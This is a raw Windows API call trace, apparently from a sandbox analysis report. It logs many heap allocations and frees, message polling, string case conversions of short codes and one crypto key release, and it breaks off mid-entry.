[0262.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.611] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0262.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0262.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.611] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0262.611] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0262.611] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.612] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0262.612] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.612] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.612] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.612] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.612] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.612] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.613] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.613] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.613] CryptDestroyKey (hKey=0xaa5920) returned 1 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0262.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0262.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0262.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0262.615] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0262.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0262.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.616] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.616] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0262.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.617] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.617] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.618] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.618] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.618] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.618] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.618] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.619] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.619] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0262.621] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.621] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.621] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.621] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.621] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.622] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.622] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: 